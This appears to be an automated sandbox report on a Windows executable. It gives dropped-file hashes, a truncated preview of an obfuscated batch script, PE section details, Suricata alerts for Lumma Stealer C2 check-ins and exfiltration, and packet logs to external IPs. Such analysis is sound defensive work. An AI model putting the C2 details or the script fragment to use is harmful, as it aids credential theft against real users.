C:\Users\user\AppData\Local\Temp\Symposium

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\Symposium.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\User

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	148480
Entropy (8bit):	6.695251861322664
Encrypted:	false
SSDEEP:	3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
MD5:	A1E25E38AD59F032B7717CC6E5E00609
SHA1:	F7E7D770656E25F73BE807AC53F49776810099D5
SHA-256:	A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
SHA-512:	4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
Malicious:	false
Preview:	f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.

C:\Users\user\AppData\Local\Temp\Zone

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997576222410487
Encrypted:	true
SSDEEP:	1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
MD5:	6ECD89B15DFAEE100B13F894C76F9CEE
SHA1:	CFF0D1262CAD22201D25B331AFD9EB882865767F
SHA-256:	73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
SHA-512:	6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
Malicious:	false
Preview:	/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...\|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....\|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u\|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..\|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.984759864242593
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CLaYpUL3zw.exe
File size:	7'045'120 bytes
MD5:	ccf904b9afa2515f1120932e4bd1f148
SHA1:	b7e131f06fd949ed071c745111d5589cd3be7ef9
SHA256:	06fc3e8f951fa3855d4056ea043a8de4d24b78df32f4423402305aa516fd56ff
SHA512:	c3128567f9d0f6babf70ef8cf6e1332de000d477acaeb0d3b4762ac32c4daa6c4d428c8a4f5ce4b8613c278de624c20d3ca97291d9863fdbe84831b51b27d000
SSDEEP:	196608:YZXavTeVG5FTdokwbzfD73IYRWVazi4rAySBQ1onE:BLeVmFCkwbzfDL1AyFMySB
TLSH:	5B6633B0C7A97509FB79273671F68258E024264FF164B13A517F48B81A0FE64F9A30F9
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.............. ... y...@.. ................................k...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xfcc000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA03109B9FAh
divps xmm5, dqword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FA03109D9F5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x794055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x792000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7941f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x790000	0x518a00	2fbf093837e8cee5d39ba3ec984a2c63	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x792000	0x53c	0x400	1e79ce1080218c2624b7dd874ced5d20	False	0.6865234375	data	5.662923418985293	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x794000	0x2000	0x200	a0232179652c49de360269397bdb9eca	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x796000	0x298000	0x200	0730bfccdedc6661c2d4e01afcaf3015	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uppnmxuj	0xa2e000	0x19c000	0x19a800	dd70d50c9cd809571f434545ad0d6e17	False	0.9946467484394031	data	7.954185855265194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wnsrsfkt	0xbca000	0x2000	0x400	e44a956cbf3c025f5df9f67f7c71e35d	False	0.7548828125	data	6.032118595733143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xbcc000	0x4000	0x2200	faebd53e9e35aee09196b05031bfce31	False	0.06606158088235294	DOS executable (COM)	0.733376591014825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbc8340	0x244	data			0.4689655172413793
RT_MANIFEST	0xbc8584	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:29:52.671566+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49774	172.67.128.184	443	TCP
2024-12-28T09:29:53.732328+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49774	172.67.128.184	443	TCP
2024-12-28T09:29:53.732328+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49774	172.67.128.184	443	TCP
2024-12-28T09:29:54.952954+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49781	172.67.128.184	443	TCP
2024-12-28T09:29:55.726467+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49781	172.67.128.184	443	TCP
2024-12-28T09:29:55.726467+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49781	172.67.128.184	443	TCP
2024-12-28T09:29:57.475683+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49787	172.67.128.184	443	TCP
2024-12-28T09:29:58.431227+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49787	172.67.128.184	443	TCP
2024-12-28T09:30:00.115076+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49794	172.67.128.184	443	TCP
2024-12-28T09:30:02.418306+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49800	172.67.128.184	443	TCP
2024-12-28T09:30:05.088798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49810	172.67.128.184	443	TCP
2024-12-28T09:30:08.149158+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49818	172.67.128.184	443	TCP
2024-12-28T09:30:13.613991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49830	172.67.128.184	443	TCP
2024-12-28T09:30:14.478972+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49830	172.67.128.184	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:29:28.423528910 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:28.423588991 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:28.423667908 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:28.427788973 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:28.427818060 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:30.289993048 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:30.334589005 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.387451887 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.387465000 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:30.388818026 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:30.388899088 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.425549030 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.425673008 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:30.466856003 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.466869116 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:30.506433964 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.701024055 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:30.743345022 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:31.272587061 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:31.272686005 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:31.272753000 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:31.273809910 CET	49719	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:29:31.273828030 CET	443	49719	34.226.108.155	192.168.2.5
Dec 28, 2024 09:29:46.691281080 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:46.810750008 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.810851097 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:46.812155008 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:46.933722019 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933736086 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933743954 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933754921 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933763981 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933773994 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933784962 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933818102 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:46.933868885 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:46.933870077 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933881044 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933896065 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:46.933933020 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:46.933959007 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.053492069 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.053507090 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.053524017 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.053551912 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.053589106 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.053699017 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.053709030 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.053742886 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.053750992 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.053788900 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.097456932 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.097618103 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.217184067 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.217289925 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.261364937 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.265100002 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.381366014 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.473344088 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.475146055 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.721375942 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.721467018 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.862211943 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.865118980 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.865191936 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.984733105 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984740019 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984805107 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.984812975 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984824896 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984839916 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984878063 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.984901905 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.984987974 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984992981 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.984997034 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985001087 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985040903 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985045910 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985064030 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.985095024 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.985105038 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985138893 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985153913 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.985181093 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.985208988 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985270023 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985318899 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.985435009 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985507965 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985558987 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985605955 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985733032 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985766888 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.985917091 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986011028 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986053944 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986099958 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986146927 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986324072 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986377954 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986500025 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986512899 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.986563921 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.986588955 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986627102 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986653090 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:47.986673117 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:47.986732006 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.029369116 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.031915903 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.104388952 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104479074 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104484081 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104613066 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.104624987 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104650974 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104677916 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104773045 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104827881 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.104918957 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105051994 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105200052 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105205059 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105285883 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105391026 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105396032 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105483055 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105488062 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.105499983 CET	80	49762	194.87.58.92	192.168.2.5
